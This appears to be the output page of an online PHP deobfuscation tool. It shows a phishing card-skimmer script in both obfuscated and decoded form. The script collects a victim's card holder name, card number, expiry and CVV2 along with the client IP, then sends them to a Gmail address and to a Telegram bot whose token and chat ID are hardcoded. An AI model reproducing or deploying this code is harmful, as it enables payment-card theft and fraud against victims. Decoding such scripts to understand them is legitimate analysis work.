Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto xhIKL; xhIKL: session_start(); goto WlBQt; WlBQt: if (empty($_POST["\x63\141\..
Decoded Output download
<?php
goto xhIKL; xhIKL: session_start(); goto WlBQt; WlBQt: if (empty($_POST["cardno"])) { $nameErr = " "; } elseif (strlen($_POST["cardno"]) > 20) { $nameErr = " "; } elseif (strlen($_POST["cardno"]) < 1) { $nameErr = " "; } else { $_SESSION["bnk"] = $bnk = $_POST["bnk"]; $ccName = $_POST["ccName"]; $cardno = $_POST["cardno"]; $mexpiry = $_POST["mexpiry"]; $yexpiry = $_POST["yexpiry"]; $cvv2 = $_POST["cvv2"]; $ip = getenv("REMOTE_ADDR"); $port = $_SERVER["REMOTE_PORT"]; $hostname = gethostbyaddr($ip); $message = "==================+[ " . $bnk . " Result ]+==================\xa"; $message .= "card name : " . $ccName . "
\xa"; $message .= "card no : " . $cardno . "\xa\xa"; $message .= "card exp month : " . $mexpiry . "\xa\xa"; $message .= "card exp year : " . $yexpiry . "\xa\xa"; $message .= "cvv2 : " . $cvv2 . "\xa"; $message .= "Client IP : " . $ip . "\xa"; $message .= "Port : " . $port . "
"; $message .= "=============+ [ Created by OmeGaLorD ] +=============\xa"; $send = "[email protected]"; $subject = "Det {$ip}"; $headers .= "X-Mailer: PHP v" . phpversion() . "\xd
"; mail($send, $subject, $message, $headers); $botToken = "6485999816:AAG61fmygcbUJ9N9UzQAuHmhCEc5p5E4e8s"; $chatId = "6600912154"; $message = "Card name: {$ccName}\xaCard no: {$cardno}
Card exp month: {$mexpiry}
Card exp year: {$yexpiry}
Cvv2: {$cvv2}
Client ip: {$ip}
=============+ [ Created by OmeGaLorD ] +============="; $url = "https://api.telegram.org/bot{$botToken}/sendMessage"; $data = array("chat_id" => $chatId, "text" => $message); $options = array(CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $data, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false); $curl = curl_init(); curl_setopt_array($curl, $options); $response = curl_exec($curl); curl_close($curl); echo $response; } goto u5M1B; u5M1B: ?>Did this file decode correctly?
Original Code
<?php
goto xhIKL; xhIKL: session_start(); goto WlBQt; WlBQt: if (empty($_POST["\x63\141\x72\144\x6e\x6f"])) { $nameErr = "\40"; } elseif (strlen($_POST["\x63\x61\x72\x64\x6e\x6f"]) > 20) { $nameErr = "\x20"; } elseif (strlen($_POST["\143\141\x72\144\156\157"]) < 1) { $nameErr = "\40"; } else { $_SESSION["\142\x6e\x6b"] = $bnk = $_POST["\x62\156\x6b"]; $ccName = $_POST["\143\x63\x4e\141\155\145"]; $cardno = $_POST["\x63\141\162\x64\x6e\x6f"]; $mexpiry = $_POST["\155\145\170\x70\x69\162\171"]; $yexpiry = $_POST["\x79\x65\170\x70\x69\x72\x79"]; $cvv2 = $_POST["\143\x76\166\62"]; $ip = getenv("\122\x45\115\x4f\x54\x45\137\x41\x44\x44\x52"); $port = $_SERVER["\x52\105\x4d\117\124\105\137\x50\x4f\x52\x54"]; $hostname = gethostbyaddr($ip); $message = "\x3d\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\x3d\x3d\x3d\75\x2b\x5b\x20" . $bnk . "\40\x52\145\163\x75\x6c\164\x20\135\53\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\75\75\75\75\75\x3d\xa"; $message .= "\143\141\x72\144\40\156\x61\x6d\x65\x20\72\x20" . $ccName . "\12\xa"; $message .= "\x63\141\x72\x64\x20\x6e\157\x20\x3a\x20" . $cardno . "\xa\xa"; $message .= "\143\141\162\x64\x20\145\x78\160\x20\155\157\156\164\150\x20\x20\x3a\x20" . $mexpiry . "\xa\xa"; $message .= "\143\x61\x72\144\40\x65\x78\x70\40\171\x65\141\162\40\72\x20" . $yexpiry . "\xa\xa"; $message .= "\143\x76\x76\62\x20\40\72\40" . $cvv2 . "\xa"; $message .= "\x43\x6c\x69\x65\x6e\x74\40\111\x50\x20\x3a\40" . $ip . "\xa"; $message .= "\120\157\162\164\40\x3a\40" . $port . "\12"; $message .= "\x3d\x3d\x3d\75\75\x3d\75\x3d\75\75\75\75\x3d\53\x20\x5b\x20\x43\162\145\141\164\145\144\x20\x62\x79\x20\x4f\155\145\x47\141\114\157\x72\104\x20\x5d\40\53\x3d\75\x3d\x3d\75\x3d\x3d\75\x3d\75\x3d\75\75\xa"; $send = "\x77\145\x65\156\157\x72\164\x68\62\60\x30\x40\147\155\141\x69\154\x2e\143\157\x6d"; $subject = "\104\145\x74\40{$ip}"; $headers .= "\x58\55\x4d\141\151\154\x65\162\72\x20\x50\x48\x50\40\166" . phpversion() . "\xd\12"; mail($send, $subject, $message, $headers); $botToken = "\66\x34\70\65\71\71\x39\70\61\x36\72\101\x41\x47\66\x31\146\x6d\171\147\x63\142\x55\x4a\x39\x4e\71\x55\172\x51\x41\165\110\155\150\x43\x45\143\65\x70\x35\x45\x34\145\x38\163"; $chatId = "\x36\66\60\60\71\x31\62\x31\x35\x34"; $message = "\103\141\162\x64\x20\x6e\141\155\x65\x3a\40{$ccName}\xa\103\x61\x72\x64\40\x6e\x6f\72\40{$cardno}\12\103\x61\162\144\x20\145\x78\x70\x20\x6d\157\x6e\x74\150\72\x20{$mexpiry}\12\103\x61\x72\144\x20\x65\170\160\40\171\145\x61\x72\x3a\x20{$yexpiry}\12\x43\166\x76\62\x3a\40{$cvv2}\12\103\x6c\151\145\156\164\40\x69\160\x3a\40{$ip}\12\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\75\x3d\53\x20\x5b\x20\x43\x72\x65\x61\x74\x65\144\40\x62\x79\40\x4f\x6d\145\107\141\114\157\162\x44\40\x5d\x20\53\75\x3d\75\x3d\x3d\75\75\75\75\x3d\x3d\x3d\x3d"; $url = "\x68\x74\164\160\x73\x3a\57\57\x61\x70\151\56\x74\145\x6c\x65\147\x72\141\155\x2e\x6f\162\147\57\142\x6f\164{$botToken}\x2f\x73\145\156\144\115\145\163\x73\141\147\145"; $data = array("\143\150\x61\x74\137\x69\x64" => $chatId, "\x74\x65\x78\x74" => $message); $options = array(CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $data, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false); $curl = curl_init(); curl_setopt_array($curl, $options); $response = curl_exec($curl); curl_close($curl); echo $response; } goto u5M1B; u5M1B: ?>Function Calls
| None |
Stats
| MD5 | 76e2be464a23f30dd5c4c97956e89365 |
| Eval Count | 0 |
| Decode Time | 56 ms |